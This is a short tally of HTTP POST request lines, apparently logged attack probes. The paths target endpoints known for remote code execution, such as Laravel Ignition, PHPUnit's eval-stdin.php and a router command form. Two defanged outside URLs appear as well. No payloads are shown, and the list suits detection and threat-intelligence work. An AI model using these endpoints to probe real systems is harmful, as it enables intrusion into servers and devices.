1	POST	/_ignition/execute-solution	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/goform/SystemCommand	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	http[:]//lisalancaster[.]site/e3b5164b4dabaa422ba781264045323644951847abe553debe249d97c4e6f3769bdb056f3b659053ed1198f519e2186a5d009e67d8d8804fd545923db7c6389194623a202e9572365686e2eb1575b008c3043b212867100aab9422aa8cde598a	HTTP/1.1
1	POST	http[:]//seduced[.]xyz/29272c47115b5a93be87e3a9d8739fb2e8a1fea6aa31852af190389734c519465bc5c519683d30705f7ae9fe1adf4113b3085c3848c6d4dce7b4b3650e97caa7988b07362de13914896d9008a8c9551862793927a64d8a436fda41db227def1b	HTTP/1.1